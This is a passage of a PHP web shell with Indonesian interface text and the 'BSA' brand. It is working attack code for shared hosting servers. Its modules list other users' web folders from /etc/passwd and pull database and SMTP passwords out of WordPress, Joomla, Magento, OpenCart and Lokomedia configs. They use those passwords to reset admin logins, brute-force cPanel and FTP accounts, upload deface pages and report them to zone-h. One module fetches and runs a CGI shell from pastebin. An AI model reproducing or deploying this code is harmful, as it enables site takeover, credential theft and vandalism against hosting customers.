768. if(isset($_POST['jump'])) {
769. echo "<pre>";
770. foreach($urls as $url) {
771. $url = str_replace("www.", "", $url);
772. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
773. if(is_dir($web_vh) === true) {
774. if(is_readable($web_vh)) {
775. $i++;
776. $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
777. if(is_writable($web_vh)) {
778. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
779. }
780. echo $jrw."<br>";
781. }
782. }
783. }
784. if($i == 0) {
785. } else {
786. echo "<br>Total ada ".$i." Kamar di ".$ip;
787. }
788. echo "</pre>";
789. } else {
790. echo '<center>
791. <form method="post">
792. List Domains: <br>
793. <textarea name="url" style="width: 500px; height: 250px;">';
794. bing("ip:$ip");
795. echo '</textarea><br>
796. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
797. </form></center>';
798. }
799. } else {
800. echo "<pre>";
801. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Nggak bisa dibaca bosku /etc/passwd</font>");
802. while($passwd = fgets($etc)) {
803. if($passwd == '' || !$etc) {
804. echo "<font color=red>Nggak bisa dibaca bosku /etc/passwd</font>";
805. } else {
806. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
807. foreach($user_jumping[1] as $user_idx_jump) {
808. $user_jumping_dir = "/home/$user_idx_jump/public_html";
809. if(is_readable($user_jumping_dir)) {
810. $i++;
811. $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
812. if(is_writable($user_jumping_dir)) {
813. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
814. }
815. echo $jrw;
816. if(function_exists('posix_getpwuid')) {
817. $domain_jump = file_get_contents("/etc/named.conf");
818. if($domain_jump == '') {
819. echo " => ( <font color=red>Gabisa ambil nama domain nya</font> )<br>";
820. } else {
821. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
822. foreach($domains_jump[1] as $dj) {
823. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
824. $user_jumping_url = $user_jumping_url['name'];
825. if($user_jumping_url == $user_idx_jump) {
826. echo " => ( <u>$dj</u> )<br>";
827. break;
828. }
829. }
830. }
831. } else {
832. echo "<br>";
833. }
834. }
835. }
836. }
837. }
838. if($i == 0) {
839. } else {
840. echo "<br>Total ada ".$i." Kamar di ".$ip;
841. }
842. echo "</pre>";
843. }
844. echo "</div>";
845. } elseif($_GET['do'] == 'auto_edit_user') {
846. if($_POST['hajar']) {
847. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
848. echo "username atau password harus lebih dari 6 karakter";
849. } else {
850. $user_baru = $_POST['user_baru'];
851. $pass_baru = md5($_POST['pass_baru']);
852. $conf = $_POST['config_dir'];
853. $scan_conf = scandir($conf);
854. foreach($scan_conf as $file_conf) {
855. if(!is_file("$conf/$file_conf")) continue;
856. $config = file_get_contents("$conf/$file_conf");
857. if(preg_match("/JConfig|joomla/",$config)) {
858. $dbhost = ambilkata($config,"host = '","'");
859. $dbuser = ambilkata($config,"user = '","'");
860. $dbpass = ambilkata($config,"password = '","'");
861. $dbname = ambilkata($config,"db = '","'");
862. $dbprefix = ambilkata($config,"dbprefix = '","'");
863. $prefix = $dbprefix."users";
864. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
865. $db = mysql_select_db($dbname);
866. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
867. $result = mysql_fetch_array($q);
868. $id = $result['id'];
869. $site = ambilkata($config,"sitename = '","'");
870. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
871. echo "Config => ".$file_conf."<br>";
872. echo "CMS => Joomla<br>";
873. if($site == '') {
874. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
875. } else {
876. echo "Sitename => $site<br>";
877. }
878. if(!$update OR !$conn OR !$db) {
879. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
880. } else {
881. echo "Status => <font color=blue>Sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
882. }
883. mysql_close($conn);
884. } elseif(preg_match("/WordPress/",$config)) {
885. $dbhost = ambilkata($config,"DB_HOST', '","'");
886. $dbuser = ambilkata($config,"DB_USER', '","'");
887. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
888. $dbname = ambilkata($config,"DB_NAME', '","'");
889. $dbprefix = ambilkata($config,"table_prefix = '","'");
890. $prefix = $dbprefix."users";
891. $option = $dbprefix."options";
892. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
893. $db = mysql_select_db($dbname);
894. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
895. $result = mysql_fetch_array($q);
896. $id = $result[ID];
897. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
898. $result2 = mysql_fetch_array($q2);
899. $target = $result2[option_value];
900. if($target == '') {
901. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
902. } else {
903. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
904. }
905. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
906. echo "Config => ".$file_conf."<br>";
907. echo "CMS => Wordpress<br>";
908. echo $url_target;
909. if(!$update OR !$conn OR !$db) {
910. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
911. } else {
912. echo "Status => <font color=blue>Sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
913. }
914. mysql_close($conn);
915. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
916. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
917. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
918. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
919. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
920. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
921. $prefix = $dbprefix."admin_user";
922. $option = $dbprefix."core_config_data";
923. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
924. $db = mysql_select_db($dbname);
925. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
926. $result = mysql_fetch_array($q);
927. $id = $result[user_id];
928. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
929. $result2 = mysql_fetch_array($q2);
930. $target = $result2[value];
931. if($target == '') {
932. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
933. } else {
934. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
935. }
936. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
937. echo "Config => ".$file_conf."<br>";
938. echo "CMS => Magento<br>";
939. echo $url_target;
940. if(!$update OR !$conn OR !$db) {
941. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
942. } else {
943. echo "Status => <font color=blue>Sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
944. }
945. mysql_close($conn);
946. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
947. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
948. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
949. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
950. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
951. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
952. $prefix = $dbprefix."user";
953. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
954. $db = mysql_select_db($dbname);
955. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
956. $result = mysql_fetch_array($q);
957. $id = $result[user_id];
958. $target = ambilkata($config,"HTTP_SERVER', '","'");
959. if($target == '') {
960. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
961. } else {
962. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
963. }
964. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
965. echo "Config => ".$file_conf."<br>";
966. echo "CMS => OpenCart<br>";
967. echo $url_target;
968. if(!$update OR !$conn OR !$db) {
969. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
970. } else {
971. echo "Status => <font color=blue>Sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
972. }
973. mysql_close($conn);
974. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
975. $dbhost = ambilkata($config,'server = "','"');
976. $dbuser = ambilkata($config,'username = "','"');
977. $dbpass = ambilkata($config,'password = "','"');
978. $dbname = ambilkata($config,'database = "','"');
979. $prefix = "users";
980. $option = "identitas";
981. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
982. $db = mysql_select_db($dbname);
983. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
984. $result = mysql_fetch_array($q);
985. $target = $result[alamat_website];
986. if($target == '') {
987. $target2 = $result[url];
988. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
989. if($target2 == '') {
990. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
991. } else {
992. $cek_login3 = file_get_contents("$target2/adminweb/");
993. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
994. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
995. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
996. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
997. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
998. } else {
999. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1000. }
1001. }
1002. } else {
1003. $cek_login = file_get_contents("$target/adminweb/");
1004. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1005. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1006. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1007. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1008. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1009. } else {
1010. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1011. }
1012. }
1013. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1014. echo "Config => ".$file_conf."<br>";
1015. echo "CMS => Lokomedia<br>";
1016. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1017. echo $url_target2;
1018. } else {
1019. echo $url_target;
1020. }
1021. if(!$update OR !$conn OR !$db) {
1022. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1023. } else {
1024. echo "Status => <font color=blue>Sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1025. }
1026. mysql_close($conn);
1027. }
1028. }
1029. }
1030. } else {
1031. echo "<center>
1032. <h1>Auto Edit User Config</h1>
1033. <form method='post'>
1034. DIR Config: <br>
1035. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1036. Set User & Pass: <br>
1037. <input type='text' name='user_baru' value='BSA' placeholder='user_baru'><br>
1038. <input type='text' name='pass_baru' value='BSA' placeholder='pass_baru'><br>
1039. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1040. </form>
1041. <span>NB: konTools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1042. ";
1043. }
1044. } elseif($_GET['do'] == 'cpanel') {
1045. if($_POST['crack']) {
1046. $usercp = explode("\r\n", $_POST['user_cp']);
1047. $passcp = explode("\r\n", $_POST['pass_cp']);
1048. $i = 0;
1049. foreach($usercp as $ucp) {
1050. foreach($passcp as $pcp) {
1051. if(@mysql_connect('localhost', $ucp, $pcp)) {
1052. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1053. } else {
1054. $_SESSION[$ucp] = "1";
1055. $_SESSION[$pcp] = "1";
1056. if($ucp == '' || $pcp == '') {
1057.  
1058. } else {
1059. $i++;
1060. if(function_exists('posix_getpwuid')) {
1061. $domain_cp = file_get_contents("/etc/named.conf");
1062. if($domain_cp == '') {
1063. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1064. } else {
1065. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1066. foreach($domains_cp[1] as $dj) {
1067. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1068. $user_cp_url = $user_cp_url['name'];
1069. if($user_cp_url == $ucp) {
1070. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1071. break;
1072. }
1073. }
1074. }
1075. } else {
1076. $dom = "<font color=red>function is Disable by system</font>";
1077. }
1078. echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>) domain ($dom)<br>";
1079. }
1080. }
1081. }
1082. }
1083. }
1084. if($i == 0) {
1085. } else {
1086. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>BSA.</font>";
1087. }
1088. } else {
1089. echo "<center>
1090. <form method='post'>
1091. USER: <br>
1092. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1093. $_usercp = fopen("/etc/passwd","r");
1094. while($getu = fgets($_usercp)) {
1095. if($getu == '' || !$_usercp) {
1096. echo "<font color=red>Nggak bisa dibaca bosku /etc/passwd</font>";
1097. } else {
1098. preg_match_all("/(.*?):x:/", $getu, $u);
1099. foreach($u[1] as $user_cp) {
1100. if(is_dir("/home/$user_cp/public_html")) {
1101. echo "$user_cp\n";
1102. }
1103. }
1104. }
1105. }
1106. echo "</textarea><br>
1107. PASS: <br>
1108. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1109. function cp_pass($dir) {
1110. $pass = "";
1111. $dira = scandir($dir);
1112. foreach($dira as $dirb) {
1113. if(!is_file("$dir/$dirb")) continue;
1114. $ambil = file_get_contents("$dir/$dirb");
1115. if(preg_match("/WordPress/", $ambil)) {
1116. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1117. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1118. $pass .= ambilkata($ambil,"password = '","'")."\n";
1119. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1120. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1121. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1122. $pass .= ambilkata($ambil,'password = "','"')."\n";
1123. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1124. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1125. } elseif(preg_match("/^[client]$/", $ambil)) {
1126. preg_match("/password=(.*?)/", $ambil, $pass1);
1127. if(preg_match('/"/', $pass1[1])) {
1128. $pass1[1] = str_replace('"', "", $pass1[1]);
1129. $pass .= $pass1[1]."\n";
1130. } else {
1131. $pass .= $pass1[1]."\n";
1132. }
1133. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1134. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1135. }
1136. }
1137. echo $pass;
1138. }
1139. $cp_pass = cp_pass($dir);
1140. echo $cp_pass;
1141. echo "</textarea><br>
1142. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1143. </form>
1144. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1145. }
1146. } elseif($_GET['do'] == 'cpftp_auto') {
1147. if($_POST['crack']) {
1148. $usercp = explode("\r\n", $_POST['user_cp']);
1149. $passcp = explode("\r\n", $_POST['pass_cp']);
1150. $i = 0;
1151. foreach($usercp as $ucp) {
1152. foreach($passcp as $pcp) {
1153. if(@mysql_connect('localhost', $ucp, $pcp)) {
1154. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1155. } else {
1156. $_SESSION[$ucp] = "1";
1157. $_SESSION[$pcp] = "1";
1158. if($ucp == '' || $pcp == '') {
1159. //
1160. } else {
1161. echo "[+] username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
1162. $ftp_conn = ftp_connect($ip);
1163. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1164. if((!$ftp_login) || (!$ftp_conn)) {
1165. echo "[+] <font color=red>Login Gagal</font><br><br>";
1166. } else {
1167. echo "[+] <font color=blue>Login Sukses</font><br>";
1168. $fi = htmlspecialchars($_POST['file_deface']);
1169. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1170. if($deface) {
1171. $i++;
1172. echo "[+] <font color=blue>Pepes Sukses</font><br>";
1173. if(function_exists('posix_getpwuid')) {
1174. $domain_cp = file_get_contents("/etc/named.conf");
1175. if($domain_cp == '') {
1176. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1177. } else {
1178. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1179. foreach($domains_cp[1] as $dj) {
1180. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1181. $user_cp_url = $user_cp_url['name'];
1182. if($user_cp_url == $ucp) {
1183. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1184. break;
1185. }
1186. }
1187. }
1188. } else {
1189. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1190. }
1191. } else {
1192. echo "[-] <font color=red>Pepes Gagal</font><br><br>";
1193. }
1194. }
1195. echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
1196. }
1197. }
1198. }
1199. }
1200. }
1201. if($i == 0) {
1202. } else {
1203. echo "<br>Sukses Pepes ".$i." Cpanel by <font color=blue>BSA.</font>";
1204. }
1205. } else {
1206. echo "<center>
1207. <form method='post'>
1208. Filename: <br>
1209. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1210. Pepes Page: <br>
1211. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-pepes.com/filemu.php' style='width: 450px;'><br>
1212. USER: <br>
1213. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1214. $_usercp = fopen("/etc/passwd","r");
1215. while($getu = fgets($_usercp)) {
1216. if($getu == '' || !$_usercp) {
1217. echo "<font color=red>Nggak bisa dibaca bosku /etc/passwd</font>";
1218. } else {
1219. preg_match_all("/(.*?):x:/", $getu, $u);
1220. foreach($u[1] as $user_cp) {
1221. if(is_dir("/home/$user_cp/public_html")) {
1222. echo "$user_cp\n";
1223. }
1224. }
1225. }
1226. }
1227. echo "</textarea><br>
1228. PASS: <br>
1229. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1230. function cp_pass($dir) {
1231. $pass = "";
1232. $dira = scandir($dir);
1233. foreach($dira as $dirb) {
1234. if(!is_file("$dir/$dirb")) continue;
1235. $ambil = file_get_contents("$dir/$dirb");
1236. if(preg_match("/WordPress/", $ambil)) {
1237. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1238. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1239. $pass .= ambilkata($ambil,"password = '","'")."\n";
1240. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1241. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1242. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1243. $pass .= ambilkata($ambil,'password = "','"')."\n";
1244. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1245. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1246. } elseif(preg_match("/client/", $ambil)) {
1247. preg_match("/password=(.*)/", $ambil, $pass1);
1248. if(preg_match('/"/', $pass1[1])) {
1249. $pass1[1] = str_replace('"', "", $pass1[1]);
1250. $pass .= $pass1[1]."\n";
1251. }
1252. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1253. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1254. }
1255. }
1256. echo $pass;
1257. }
1258. $cp_pass = cp_pass($dir);
1259. echo $cp_pass;
1260. echo "</textarea><br>
1261. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1262. </form>
1263. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1264. }
1265. } elseif($_GET['do'] == 'smtp') {
1266. echo "<center><span>NB: konTools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1267. function scj($dir) {
1268. $dira = scandir($dir);
1269. foreach($dira as $dirb) {
1270. if(!is_file("$dir/$dirb")) continue;
1271. $ambil = file_get_contents("$dir/$dirb");
1272. $ambil = str_replace("$", "", $ambil);
1273. if(preg_match("/JConfig|joomla/", $ambil)) {
1274. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1275. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1276. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1277. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1278. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1279. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1280. echo "SMTP Host: <font color=blue>$smtp_host</font><br>";
1281. echo "SMTP port: <font color=blue>$smtp_port</font><br>";
1282. echo "SMTP user: <font color=blue>$smtp_user</font><br>";
1283. echo "SMTP pass: <font color=blue>$smtp_pass</font><br>";
1284. echo "SMTP auth: <font color=blue>$smtp_auth</font><br>";
1285. echo "SMTP secure: <font color=blue>$smtp_secure</font><br><br>";
1286. }
1287. }
1288. }
1289. $smpt_hunter = scj($dir);
1290. echo $smpt_hunter;
1291. } elseif($_GET['do'] == 'auto_wp') {
1292. if($_POST['hajar']) {
1293. $title = htmlspecialchars($_POST['new_title']);
1294. $pn_title = str_replace(" ", "-", $title);
1295. if($_POST['cek_edit'] == "Y") {
1296. $script = $_POST['edit_content'];
1297. } else {
1298. $script = $title;
1299. }
1300. $conf = $_POST['config_dir'];
1301. $scan_conf = scandir($conf);
1302. foreach($scan_conf as $file_conf) {
1303. if(!is_file("$conf/$file_conf")) continue;
1304. $config = file_get_contents("$conf/$file_conf");
1305. if(preg_match("/WordPress/", $config)) {
1306. $dbhost = ambilkata($config,"DB_HOST', '","'");
1307. $dbuser = ambilkata($config,"DB_USER', '","'");
1308. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1309. $dbname = ambilkata($config,"DB_NAME', '","'");
1310. $dbprefix = ambilkata($config,"table_prefix = '","'");
1311. $prefix = $dbprefix."posts";
1312. $option = $dbprefix."options";
1313. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1314. $db = mysql_select_db($dbname);
1315. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1316. $result = mysql_fetch_array($q);
1317. $id = $result[ID];
1318. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1319. $result2 = mysql_fetch_array($q2);
1320. $target = $result2[option_value];
1321. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1322. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1323. echo "<div style='margin: 5px auto;'>";
1324. if($target == '') {
1325. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1326. } else {
1327. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1328. }
1329. if(!$update OR !$conn OR !$db) {
1330. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1331. } else {
1332. echo "<font color=blue>Sukses di ganti.</font><br>";
1333. }
1334. echo "</div>";
1335. mysql_close($conn);
1336. }
1337. }
1338. } else {
1339. echo "<center>
1340. <h1>Auto Edit Title+Content WordPress</h1>
1341. <form method='post'>
1342. DIR Config: <br>
1343. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1344. Set Title: <br>
1345. <input type='text' name='new_title' value='Hacked by BSA' placeholder='New Title'><br><br>
1346. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1347. <span>Jika pilih <u>Y</u> Masukin script Pepesmu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1348. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1349. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1350. </form>
1351. <span>NB: konTools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1352. ";
1353. }
1354. } elseif($_GET['do'] == 'zoneh') {
1355. if($_POST['submit']) {
1356. $domain = explode("\r\n", $_POST['url']);
1357. $nick = $_POST['nick'];
1358. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1359. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1360. function zoneh($url,$nick) {
1361. $ch = curl_init("http://www.zone-h.com/notify/single");
1362. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1363. curl_setopt($ch, CURLOPT_POST, true);
1364. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1365. return curl_exec($ch);
1366. curl_close($ch);
1367. }
1368. foreach($domain as $url) {
1369. $zoneh = zoneh($url,$nick);
1370. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1371. echo "$url -> <font color=blue>OK</font><br>";
1372. } else {
1373. echo "$url -> <font color=red>ERROR</font><br>";
1374. }
1375. }
1376. } else {
1377. echo "<center><form method='post'>
1378. <u>Defacer</u>: <br>
1379. <input type='text' name='nick' size='50' value='BSA'><br>
1380. <u>Domains</u>: <br>
1381. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1382. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1383. </form>";
1384. }
1385. echo "</center>";
1386. } elseif($_GET['do'] == 'cgi') {
1387. $cgi_dir = mkdir('idx_cgi', 0755);
1388. $file_cgi = "idx_cgi/cgi.izo";
1389. $isi_htcgi = "AddHandler cgi-script .izo";
1390. $htcgi = fopen(".htaccess", "w");
1391. fwrite($htcgi, $isi_htcgi);
1392. fclose($htcgi);
1393. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1394. $cgi = fopen($file_cgi, "w");
1395. fwrite($cgi, $cgi_script);
1396. fclose($cgi);
1397. chmod($file_cgi, 0755);
1398. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1399. } elseif($_GET['do'] == 'fake_root') {
1400. ob_start();
1401. $cwd = getcwd();
1402. $ambil_user = explode("/", $cwd);
1403. $user = $ambil_user[2];
1404. if($_POST['reverse']) {
1405. $site = explode("\r\n", $_POST['url']);
1406. $file = $_POST['file'];
1407. foreach($site as $url) {
1408. $cek = getsource("$url/~$user/$file");
1409. if(preg_match("/hacked/i", $cek)) {
1410. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=blue>Fake Root!</font><br>";
1411. }
1412. }
1413. } else {
1414. echo "<center><form method='post'>
1415. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1416. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1417. Domain: <br>
1418. <textarea style='width: 450px; height: 250px;' name='url'>";
1419. reverse($_SERVER['HTTP_HOST']);
1420. echo "</textarea><br>
1421. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1422. </form><br>
1423. NB: Sebelum gunain konTools ini , upload dulu file pepes kalian di dir /home/user/ dan /home/user/public_html.</center>";
1424. }
1425. } elseif($_GET['do'] == 'adminer') {
1426. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1427. function adminer($url, $isi) {
1428. $fp = fopen($isi, "w");
1429. $ch = curl_init();
1430. curl_setopt($ch, CURLOPT_URL, $url);
1431. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1432. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1433. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1434. curl_setopt($ch, CURLOPT_FILE, $fp);
1435. return curl_exec($ch);
1436. curl_close($ch);
1437. fclose($fp);
1438. ob_flush();
1439. flush();
1440. }
1441. if(file_exists('adminer.php')) {
1442. echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> Adminer login <-</a></font></center>";
1443. } else {
1444. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
